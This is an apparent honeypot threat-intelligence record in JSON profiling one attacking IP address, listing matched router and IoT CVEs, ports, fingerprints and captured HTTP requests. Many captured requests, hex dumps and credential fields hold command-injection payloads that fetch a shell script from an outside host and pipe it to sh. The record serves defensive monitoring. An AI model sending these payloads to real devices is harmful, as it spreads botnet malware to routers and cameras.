{"ip":"45.156.87.213","total_events":746,"verdict":{"verdict":"malicious","label":"Exploit attempts observed","detail":"46 exploit-path hits","confidence":"high","network_type":null,"why":["46 request(s) matched a known exploit path.","Body-carrying methods (POST/PUT/PATCH/DELETE) seen: payload delivery, not just recon.","5+ hits raise confidence to high.","Not in any known-scanner range."]},"first_seen":"2026-07-07T16:56:30","last_seen":"2026-07-14T11:17:49","events_24h":0,"events_7d":0,"geo":{"country_code":"NL","country_name":"The Netherlands","region":"Limburg","city":"Eygelshoven","lat":50.8897,"lon":6.0563,"asn":197170,"org":"TechTies Inc."},"source_domain":null,"known_scanners":[],"scanner_tag":null,"cve_matches":[{"cve_id":"CVE-2018-10562","title":"Dasan GPON Devices - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/GponForm/diag_Form"},{"cve_id":"CVE-2020-10987","title":"Tenda AC15 AC1900 version 15.03.05.19 - Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/goform/setUsbUnload"},{"cve_id":"CVE-2022-30525","title":"Zyxel Firewall - OS Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/ztp/cgi-bin/handler"},{"cve_id":"CVE-2025-29635","title":"D-Link DIR-823X set_prohibiting - Command Injection","severity":"high","actively_exploited":true,"match_field":"url_path","matched_pattern":"/goform/set_prohibiting"},{"cve_id":"CVE-2018-10561","title":"GPON Router Command Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"GponForm/diag_Form"},{"cve_id":"CVE-2014-2321","title":"ZTE Cable Modem Web Shell","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/web_shell_cmd.gch"},{"cve_id":"CVE-2018-17153","title":"Western Digital MyCloud NAS - Authentication Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/web/google_analytics.php"},{"cve_id":"CVE-2022-0342","title":"Zyxel - Authentication Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/export-cgi"},{"cve_id":"CVE-2022-25082","title":"TOTOLink - Unauthenticated Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/downloadFlile.cgi"},{"cve_id":"CVE-2023-30013","title":"TOTOLink - Unauthenticated Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/cstecgi.cgi"},{"cve_id":"CVE-2023-3380","title":"WAVLINK WN579X3 - Remote Command Execution","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/adm.cgi"},{"cve_id":"CVE-2023-46574","title":"TOTOLINK A3700R - Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/cstecgi.cgi"},{"cve_id":"CVE-2024-22729","title":"Netis MW5360 V1.0.1.3031 - Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/skk_set.cgi"},{"cve_id":"CVE-2024-24328","title":"TotoLink Router setMacFilterRules - Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/cstecgi.cgi"},{"cve_id":"CVE-2024-24329","title":"TotoLink Router setPortForwardRules - Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/cstecgi.cgi"},{"cve_id":"CVE-2019-19824","title":"TOTOLINK Realtek SD Routers - Remote Command Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/boafrm/formSysCmd"},{"cve_id":"CVE-2024-34257","title":"TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/cstecgi.cgi"},{"cve_id":"CVE-2024-7029","title":"AVTECH IP Camera - Command Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/supervisor/Factory.cgi"},{"cve_id":"CVE-2024-51228","title":"TOTOLINK CX-A3002RU - Remote Code Execution","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/boafrm/formSysCmd"},{"cve_id":"CVE-2017-17215","title":"Huawei Router UPnP RCE / Mozi","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"DeviceUpgrade_1"}],"malware":[{"sha256":"90e72cb310525972af1e9d97cd837d48aaf87a429930b507f56befddff1ff713","family":"shell","vt_name":"init.sh","malicious":4,"total":73,"vt_status":"known","delivery":"busybox-wget","url_path":"/web_shell_cmd.gch","dest_port":81,"hits":2,"last_seen":"2026-07-08 00:43:41"}],"top_ports":[{"port":81,"proto":"tcp","label":"","count":268},{"port":82,"proto":"tcp","label":"","count":198},{"port":8000,"proto":"tcp","label":"HTTP-alt","count":153},{"port":8080,"proto":"tcp","label":"HTTP-alt","count":127}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["po11nn0500_39d3d05515f5","ge11nn0100_4740ae6347b0","po11nn0700_e21ec020390a","po11nn0500_3bc7f06d1d8b","po11nn0400_fdcc3615ee04"]},"fingerprint_peers":{"po11nn0500_39d3d05515f5":7,"po11nn0400_fdcc3615ee04":12,"po11nn0500_3bc7f06d1d8b":7,"ge11nn0100_4740ae6347b0":665,"po11nn0700_e21ec020390a":3},"user_agents":["Mozila/5.0"],"timeline":[{"date":"2026-07-07","count":2},{"date":"2026-07-08","count":114},{"date":"2026-07-09","count":35},{"date":"2026-07-10","count":198},{"date":"2026-07-11","count":40},{"date":"2026-07-12","count":204},{"date":"2026-07-14","count":153}],"recent_events":[{"timestamp":"2026-07-14T11:17:49","port":81,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"host\":\"<HONEYPOT>:81\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dlnas%60","summary":"","payload_hex":"474554202f6367692d62696e2f6163636f756e745f6d67722e6367693f636d643d6367695f757365725f616464266e616d653d25363063642532302f746d7025334277676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d73253230646c6e617325334262757379626f7825323077676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d73253230646c6e61732533426375726c253230687474703a2f2f39312e39322e34302e3131382f776765742e736825374373682532302d73253230646c6e617325363020485454502f312e310d0a486f73743a20<HONEYPOT>3a38310d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"","community_id":"1:yHIMXoWVgG1klr/GGf/PkcXHG58=","ja3":"","session":"c035b9ae-9d8e-455d-ad4a-f037d7d4c252","seq":1,"duration_ms":101,"bytes_in":308,"bytes_out":78},{"timestamp":"2026-07-14T11:17:48","port":81,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"content-length\":\"164\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:81\"}","body":"cmd=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s zyxrh;busybox wget http://91.92.40.118/wget.sh -O-|sh -s zyxrh;curl http://91.92.40.118/wget.sh|sh -s zyxrh`","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/cgi-bin/remote_help-cgi","summary":"","payload_hex":"504f5354202f6367692d62696e2f72656d6f74655f68656c702d63676920485454502f312e310d0a486f73743a20<HONEYPOT>3a38310d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203136340d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a636d643d606364202f746d703b7767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d73207a797872683b62757379626f78207767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d73207a797872683b6375726c20687474703a2f2f39312e39322e34302e3131382f776765742e73687c7368202d73207a7978726860","method":"POST","user_agent":"","community_id":"1:T1CXOMqB/JBCmLw4kYY2YRPnlRc=","ja3":"","session":"551104dd-c672-4eae-934f-1837b229e369","seq":1,"duration_ms":100,"bytes_in":318,"bytes_out":78},{"timestamp":"2026-07-14T11:17:48","port":81,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"content-length\":\"170\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:81\"}","body":"setCookie=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s zyxsc;busybox wget http://91.92.40.118/wget.sh -O-|sh -s zyxsc;curl http://91.92.40.118/wget.sh|sh -s zyxsc`","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/cgi-bin/export-cgi","summary":"","payload_hex":"504f5354202f6367692d62696e2f6578706f72742d63676920485454502f312e310d0a486f73743a20<HONEYPOT>3a38310d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203137300d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a736574436f6f6b69653d606364202f746d703b7767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d73207a797873633b62757379626f78207767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d73207a797873633b6375726c20687474703a2f2f39312e39322e34302e3131382f776765742e73687c7368202d73207a7978736360","method":"POST","user_agent":"","community_id":"1:OX8VSbxQgjK01lrr7AGSVMkQW2U=","ja3":"","session":"af3cf8b9-1a75-40a3-9c97-70268d2e0c3c","seq":1,"duration_ms":100,"bytes_in":319,"bytes_out":78},{"timestamp":"2026-07-14T11:17:48","port":81,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"host\":\"<HONEYPOT>:81\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/action.php?host=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20mitsu%60","summary":"","payload_hex":"474554202f616374696f6e2e7068703f686f73743d25363063642532302f746d7025334277676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d732532306d6974737525334262757379626f7825323077676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d732532306d697473752533426375726c253230687474703a2f2f39312e39322e34302e3131382f776765742e736825374373682532302d732532306d6974737525363020485454502f312e310d0a486f73743a20<HONEYPOT>3a38310d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"","community_id":"1:poNJsjMJLEOJ5IFu4A4CgIjDyp0=","ja3":"","session":"6b95ec7e-f002-43e7-85f9-4d5eb2fe2641","seq":1,"duration_ms":100,"bytes_in":278,"bytes_out":78},{"timestamp":"2026-07-14T11:17:47","port":81,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"content-length\":\"167\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:81\"}","body":"cmd=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s iodata;busybox wget http://91.92.40.118/wget.sh -O-|sh -s iodata;curl http://91.92.40.118/wget.sh|sh -s iodata`","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/cgi-bin/remote_link3.cgi","summary":"","payload_hex":"504f5354202f6367692d62696e2f72656d6f74655f6c696e6b332e63676920485454502f312e310d0a486f73743a20<HONEYPOT>3a38310d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203136370d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a636d643d606364202f746d703b7767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d7320696f646174613b62757379626f78207767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d7320696f646174613b6375726c20687474703a2f2f39312e39322e34302e3131382f776765742e73687c7368202d7320696f6461746160","method":"POST","user_agent":"","community_id":"1:5H8+7a33d4wJbVwXBHi0SM0GnPc=","ja3":"","session":"cca14861-9379-48cb-a8ad-17ae51d45ae9","seq":1,"duration_ms":101,"bytes_in":322,"bytes_out":78},{"timestamp":"2026-07-14T11:17:47","port":81,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"host\":\"<HONEYPOT>:81\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/api/ping?host=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20genie%60","summary":"","payload_hex":"474554202f6170692f70696e673f686f73743d25363063642532302f746d7025334277676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d7325323067656e696525334262757379626f7825323077676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d7325323067656e69652533426375726c253230687474703a2f2f39312e39322e34302e3131382f776765742e736825374373682532302d7325323067656e696525363020485454502f312e310d0a486f73743a20<HONEYPOT>3a38310d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"","community_id":"1:p/aa60zE4NtjO2e/HqVDCfCYYoQ=","ja3":"","session":"9764d34f-a123-4798-8580-1f3397ac3906","seq":1,"duration_ms":100,"bytes_in":276,"bytes_out":78},{"timestamp":"2026-07-14T11:17:47","port":81,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"content-length\":\"180\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:81\"}","body":"ping=127.0.0.1`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s airspan;busybox wget http://91.92.40.118/wget.sh -O-|sh -s airspan;curl http://91.92.40.118/wget.sh|sh -s airspan`","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/cgi-bin/diagnostics.cgi","summary":"","payload_hex":"504f5354202f6367692d62696e2f646961676e6f73746963732e63676920485454502f312e310d0a486f73743a20<HONEYPOT>3a38310d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203138300d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a70696e673d3132372e302e302e31606364202f746d703b7767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d73206169727370616e3b62757379626f78207767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f2d7c7368202d73206169727370616e3b6375726c20687474703a2f2f39312e39322e34302e3131382f776765742e73687c7368202d73206169727370616e60","method":"POST","user_agent":"","community_id":"1:HIyHPzh3gjxqkpIIjPhwYerre98=","ja3":"","session":"11fc0939-c412-4e42-8f5d-854ebc6b4868","seq":1,"duration_ms":100,"bytes_in":334,"bytes_out":78},{"timestamp":"2026-07-14T11:17:46","port":81,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"host\":\"<HONEYPOT>:81\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/adv_remotelog.asp?syslogServerAddr=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20billion%60","summary":"","payload_hex":"474554202f6164765f72656d6f74656c6f672e6173703f7379736c6f67536572766572416464723d25363063642532302f746d7025334277676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d7325323062696c6c696f6e25334262757379626f7825323077676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d7325323062696c6c696f6e2533426375726c253230687474703a2f2f39312e39322e34302e3131382f776765742e736825374373682532302d7325323062696c6c696f6e25363020485454502f312e310d0a486f73743a20<HONEYPOT>3a38310d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"","community_id":"1:1vaf19yg5qB4NATx3pLue9UsBO8=","ja3":"","session":"02027f11-47b3-415b-b14e-a4a05ed592fe","seq":1,"duration_ms":100,"bytes_in":303,"bytes_out":78},{"timestamp":"2026-07-14T11:17:46","port":81,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"host\":\"<HONEYPOT>:81\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/api/v1/status?command=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20xiaomi%60","summary":"","payload_hex":"474554202f6170692f76312f7374617475733f636f6d6d616e643d25363063642532302f746d7025334277676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d732532307869616f6d6925334262757379626f7825323077676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d732532307869616f6d692533426375726c253230687474703a2f2f39312e39322e34302e3131382f776765742e736825374373682532302d732532307869616f6d6925363020485454502f312e310d0a486f73743a20<HONEYPOT>3a38310d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"","community_id":"1:Qc+lxLJ8ig5d5uenb2yy7NQz6Z8=","ja3":"","session":"3749e2b3-39b4-4feb-b43d-392e00387ebe","seq":1,"duration_ms":100,"bytes_in":287,"bytes_out":78},{"timestamp":"2026-07-14T11:17:46","port":81,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"host\":\"<HONEYPOT>:81\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/login.cgi?cli=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dlcli%60","summary":"","payload_hex":"474554202f6c6f67696e2e6367693f636c693d25363063642532302f746d7025334277676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d73253230646c636c6925334262757379626f7825323077676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2d25374373682532302d73253230646c636c692533426375726c253230687474703a2f2f39312e39322e34302e3131382f776765742e736825374373682532302d73253230646c636c6925363020485454502f312e310d0a486f73743a20<HONEYPOT>3a38310d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"","community_id":"1:yyVdhG3M2znVSX5If+GP65fdeic=","ja3":"","session":"5312717c-5262-4575-ae2f-82b657d3add7","seq":1,"duration_ms":100,"bytes_in":276,"bytes_out":78}],"http_methods":[{"method":"POST","count":393},{"method":"GET","count":266}],"distinct_ports_total":4,"top_paths":[{"path":"/apply.cgi","count":69,"ports":4},{"path":"/","count":69,"ports":4},{"path":"/JNAP/","count":52,"ports":4},{"path":"/tmUnblock.cgi","count":29,"ports":4},{"path":"/diagnostic.php","count":16,"ports":4},{"path":"/sysinfo.cgi?action=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsysinfo","count":13,"ports":4},{"path":"/goform/setUsbUnload/.js?deviceName=A;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20tenda","count":13,"ports":4},{"path":"/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lublk%60","count":13,"ports":4},{"path":"/login.cgi","count":13,"ports":4},{"path":"/cgi-bin/masterCGI?ping=nomip&user=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20alcatel;","count":13,"ports":4},{"path":"/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lhablk%60","count":13,"ports":4},{"path":"/setup.cgi?next_file=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsetup","count":13,"ports":4},{"path":"/config/?cmd=cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dcs","count":13,"ports":4},{"path":"/hndUnblock.cgi","count":13,"ports":4},{"path":"/storage/apply.cgi","count":13,"ports":4}],"distinct_paths_total":108,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[{"username":"admin`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s zyx326;","password":"x","count":3},{"username":"admin","password":"`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s sound4;busyb","count":3},{"username":";`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s mtrail;busy","password":"","count":1},{"username":"","password":"`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s netis;busybo","count":1}],"header_profile":{"signature":["Connection","Content-Length","Content-Type","Host"],"representative":[{"name":"Connection","value":"close","notable":false},{"name":"Content-Length","value":"164","notable":false},{"name":"Content-Type","value":"application/x-www-form-urlencoded","notable":true},{"name":"Host","value":"<HONEYPOT>:81","notable":false}],"distinct_sets":2,"events_with_headers":10},"tags":[{"tag_id":"CVE-2018-10562","tag_type":"cve","title":"Dasan GPON Devices - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/GponForm/diag_Form","reference_urls":["https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router","https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py","https://nvd.nist.gov/vuln/detail/CVE-2018-10562","https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/","https://github.com/ethicalhackeragnidhra/GPON"]},{"tag_id":"CVE-2020-10987","tag_type":"cve","title":"Tenda AC15 AC1900 version 15.03.05.19 - Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/goform/setUsbUnload","reference_urls":["https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68"]},{"tag_id":"CVE-2022-30525","tag_type":"cve","title":"Zyxel Firewall - OS Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/ztp/cgi-bin/handler","reference_urls":["https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/","https://github.com/rapid7/metasploit-framework/pull/16563","https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml","https://nvd.nist.gov/vuln/detail/CVE-2022-30525","http://packetstormsecurity.com/files/167176/Zyxel-Remote-Command-Execution.html"]},{"tag_id":"CVE-2025-29635","tag_type":"cve","title":"D-Link DIR-823X set_prohibiting - Command Injection","severity":"high","actively_exploited":true,"match_field":"url_path","matched_pattern":"/goform/set_prohibiting","reference_urls":["https://securityaffairs.com/191135/malware/mirai-botnet-exploits-cve-2025-29635-to-target-legacy-d-link-routers.html","https://github.com/D-Link-SA/CVE-2025-29635/blob/main/CVE-2025-29635.md","https://nvd.nist.gov/vuln/detail/CVE-2025-29635"]},{"tag_id":"CVE-2018-10561","tag_type":"cve","title":"GPON Router Command Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"GponForm/diag_Form","reference_urls":[]},{"tag_id":"CVE-2014-2321","tag_type":"cve","title":"ZTE Cable Modem Web Shell","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/web_shell_cmd.gch","reference_urls":["https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/","https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/","https://nvd.nist.gov/vuln/detail/CVE-2014-2321","http://www.kb.cert.org/vuls/id/600724","http://www.myxzy.com/post-411.html"]},{"tag_id":"CVE-2018-17153","tag_type":"cve","title":"Western Digital MyCloud NAS - Authentication Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/web/google_analytics.php","reference_urls":["https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/","https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html","https://securify.nl/nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html","https://nvd.nist.gov/vuln/detail/CVE-2016-10108","http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html"]},{"tag_id":"CVE-2022-0342","tag_type":"cve","title":"Zyxel - Authentication Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/export-cgi","reference_urls":["https://github.com/gobysec/GobyVuls/blob/master/CVE-2022-0342.md","https://nvd.nist.gov/vuln/detail/CVE-2022-0342","https://www.zyxel.com/support/Zyxel-security-advisory-for-authentication-bypass-vulnerability-of-firewalls.shtml","https://github.com/f1tao/awesome-iot-security-resource","https://github.com/murchie85/twitterCyberMonitor"]},{"tag_id":"CVE-2022-25082","tag_type":"cve","title":"TOTOLink - Unauthenticated Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/downloadFlile.cgi","reference_urls":["https://nvd.nist.gov/vuln/detail/cve-2022-25082","https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md","https://github.com/ARPSyndicate/kenzer-templates"]},{"tag_id":"CVE-2023-30013","tag_type":"cve","title":"TOTOLink - Unauthenticated Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/cstecgi.cgi","reference_urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-30013","https://github.com/Kazamayc/vuln/tree/main/TOTOLINK/X5000R/2","http://packetstormsecurity.com/files/174799/TOTOLINK-Wireless-Routers-Remote-Command-Execution.html","https://github.com/h00die-gr3y/Metasploit"]},{"tag_id":"CVE-2023-3380","tag_type":"cve","title":"WAVLINK WN579X3 - Remote Command Execution","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/adm.cgi","reference_urls":["https://github.com/sleepyvv/vul_report/blob/main/WAVLINK/WAVLINK-WN579X3-RCE.md","https://vuldb.com/?ctiid.232236","https://vuldb.com/?id.232236"]},{"tag_id":"CVE-2023-46574","tag_type":"cve","title":"TOTOLINK A3700R - Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/cstecgi.cgi","reference_urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-46574","https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md","https://github.com/Marco-zcl/POC","https://github.com/d4n-sec/d4n-sec.github.io","https://github.com/wy876/POC"]},{"tag_id":"CVE-2024-22729","tag_type":"cve","title":"Netis MW5360 V1.0.1.3031 - Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/skk_set.cgi","reference_urls":["https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md"]},{"tag_id":"CVE-2024-24328","tag_type":"cve","title":"TotoLink Router setMacFilterRules - Command 